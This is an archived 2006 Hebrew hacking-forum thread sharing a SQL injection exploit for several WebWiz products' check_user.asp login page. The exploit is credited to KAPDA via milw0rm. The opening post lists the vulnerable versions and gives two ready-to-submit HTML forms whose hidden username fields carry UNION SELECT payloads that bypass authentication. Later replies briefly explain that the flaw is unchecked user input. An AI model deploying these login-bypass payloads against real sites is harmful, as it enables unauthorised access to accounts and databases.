Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > באג רציני חדש התגלה במוצרי web wiz

02/01/2006 10:07:01 Inj3ction_Boy
באג sqlinj חדש התגלה במוצרי webwiz בדף check_user.asp...
הגרסאות הפגועות:
קוד:
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions


קוד html שמנצל את החור:
קוד:
<html>
site news , journal , weekly poll
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="’union all select ’1’,’1’ from tblConfiguration where ’’=’">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
Database login
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="’union select 1 from tblusers where’’=’">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

בדוק על ידי ;]

עריכה:
נלקח מפה- http://www.milw0rm.com/id.php?id=1399

וקרדיט לKAPDA[ההודעה נערכה על-ידי Inj3ction_Boy ב-03/01/2006 00:31:25]
02/01/2006 16:15:17 cp77fk4r
נחמד, אבל היה מספיק רק את השורות של הUnion, ב"txtUserName" שבקוד שלKAPDA, לא נורא, זה סתם עושה חיים קלים יותר..

WebWiz עכשיו דווקא בעליה, כשהם התחילו מחדש, הם התחילו די מלמטה, ולכן אני מאמין שיהיו עוד SQLI בקודים שלהם, בדיוק כמו מה שהלך/הולך עם הPhpBB.

בכל אופן, תודה רבה!

03/01/2006 00:30:24 Inj3ction_Boy
אגב שחכתי להביא קרדיט אז אני יערוך עכשיו.
03/01/2006 15:38:53 antivirus
תאמין לי לא הבנתי מה האתר משווק
באיזה מוצרים מדובר...ומה הכוונה חורי אבטחה בחלק מהמוצרים...
קצת הסבר על החור..מה הוא בדיוק עושה מה הוא מנצל..איך להשתמש בו ...
03/01/2006 16:33:03 cp77fk4r
לפי הקוד HTML של KAPDA שהוא נתן אפשר להבין לבד איזה סוג באג זה.

תסתכל על השורה הזאת:
קוד:
<input type="hidden" name="txtUserName" value="’union all select ’1’,’1’ from tblConfiguration where ’’=’">


אפשר להבין שמדובר פה על באג SQLInj, ולפי השורה הזאת:

קוד:
form method="POST" action="http://target/[product]/check_user.asp">


אפשר להבין שהבאג קיים בעמוד
check_user.asp.

אין הרבה מה לפרט כשמדובר בבאג מסוג SQLInj, כי כל הבאגים פשוט אותו הדבר ולרב זה פשוט מחוסר בדיקה, מי שכתב את המקטע הזה במערכת לא בדק את הקלט שהמשתמש מכניס, ולכן אפשר להכניס גם שאילתות SQL זדוניות.

אם אתה רוצה הסבר על הבאג SQLInj כנס לת’ארד טקסטים, ותחפש שם את הטקסט שכתבתי בנושא.
03/01/2006 22:22:38 antivirus
(: זה בסדר סיפי קראתי את כל הת’ארד טקסטים וגם את המאמר המורחב
ב אנדרוואוריור והבנתי כבר מההתחלה במה מדובר פשוט רציתי שהזרקה ירחיה קצת :)
04/01/2006 01:55:18 cp77fk4r
אוקיי, סבבה, רק רציתי להיות בטוח.

אני עכשיו אפרסם את החוק החדש בנושא.
04/01/2006 07:34:45 antivirus
מעולה
עמודים: 1